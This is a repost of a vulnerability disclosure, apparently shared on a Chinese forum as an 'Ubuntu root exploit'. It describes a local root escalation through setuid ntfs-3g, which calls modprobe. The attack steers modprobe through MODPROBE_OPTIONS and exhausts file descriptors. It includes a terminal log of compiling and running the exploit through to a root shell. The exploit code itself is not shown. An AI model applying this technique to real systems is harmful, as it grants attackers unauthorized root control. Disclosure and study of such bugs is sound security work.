ubuntu root提权exploit ​​​​

admin

1. ntfs-3g is installed by default e.g. on Ubuntu and comes with a
   
2. setuid root program /bin/ntfs-3g. When this program is invoked on a
   
3. system whose kernel does not support FUSE filesystems (detected by
   
4. get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using
   
5. /sbin/modprobe via load_fuse_module().
   
6. 
   
7. The issue is that /sbin/modprobe is not designed to run in a setuid
   
8. context. As the manpage of modprobe explicitly points out:
   
9. 
   
10.        The MODPROBE_OPTIONS environment variable can also be used
    
11.        to pass arguments to modprobe.
    
12. 
    
13. Therefore, on a system that does not seem to support FUSE filesystems,
    
14. an attacker can set the environment variable MODPROBE_OPTIONS to
    
15. something like "-C /tmp/evil_config -d /tmp/evil_root" to force
    
16. modprobe to load its configuration and the module from
    
17. attacker-controlled directories. This allows a local attacker to load
    
18. arbitrary code into the kernel.
    
19. 
    
20. In practice, the FUSE module is usually already loaded. However, the
    
21. issue can still be attacked because a failure to open
    
22. /proc/filesystems (meaning that get_fuse_fstype() returns
    
23. FSTYPE_UNKNOWN) always causes modprobe to be executed, even if the
    
24. FUSE module is already loaded. An attacker can cause an attempt to
    
25. open /proc/filesystems to fail by exhausting the global limit on the
    
26. number of open file descriptions (/proc/sys/fs/file-max).
    
27. 
    
28. I have attached an exploit for the issue. I have tested it in a VM
    
29. with Ubuntu Server 16.10. To reproduce, unpack the attached file,
    
30. compile the exploit and run it:
    
31. 
    
32. user@ubuntu:~$ tar xf ntfs-3g-modprobe-unsafe.tar
    
33. user@ubuntu:~$ cd ntfs-3g-modprobe-unsafe/
    
34. user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./compile.sh
    
35. make: Entering directory '/usr/src/linux-headers-4.8.0-32-generic'
    
36.   CC [M]  /home/user/ntfs-3g-modprobe-unsafe/rootmod.o
    
37.   Building modules, stage 2.
    
38.   MODPOST 1 modules
    
39.   CC      /home/user/ntfs-3g-modprobe-unsafe/rootmod.mod.o
    
40.   LD [M]  /home/user/ntfs-3g-modprobe-unsafe/rootmod.ko
    
41. make: Leaving directory '/usr/src/linux-headers-4.8.0-32-generic'
    
42. depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.order: No such file or directory
    
43. depmod: WARNING: could not open /home/user/ntfs-3g-modprobe-unsafe/depmod_tmp//lib/modules/4.8.0-32-generic/modules.builtin: No such file or directory
    
44. user@ubuntu:~/ntfs-3g-modprobe-unsafe$ ./sploit
    
45. looks like we won the race
    
46. got ENFILE at 198088 total
    
47. Failed to open /proc/filesystems: Too many open files in system
    
48. yay, modprobe ran!
    
49. modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.u48sGO/lib/modules/4.8.0-32-generic/modules.builtin.bin'
    
50. modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
    
51. Error opening '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
    
52. Failed to mount '/tmp/ntfs_sploit.u48sGO/volume': Is a directory
    
53. we have root privs now...
    
54. root@ubuntu:~/ntfs-3g-modprobe-unsafe# id
    
55. uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lxd),123(libvirt),127(sambashare),128(lpadmin),1000(user)
    
56. 
    
57. Note: The exploit seems to work relatively reliably in VMs with
    
58. multiple CPU cores, but not in VMs with a single CPU core. If you
    
59. test this exploit in a VM, please ensure that the VM has at least two
    
60. CPU cores.
    
61. 
    
62. This bug is subject to a 90 day disclosure deadline. If 90 days elapse
    
63. without a broadly available patch, then the bug report will automatically
    
64. become visible to the public.

复制代码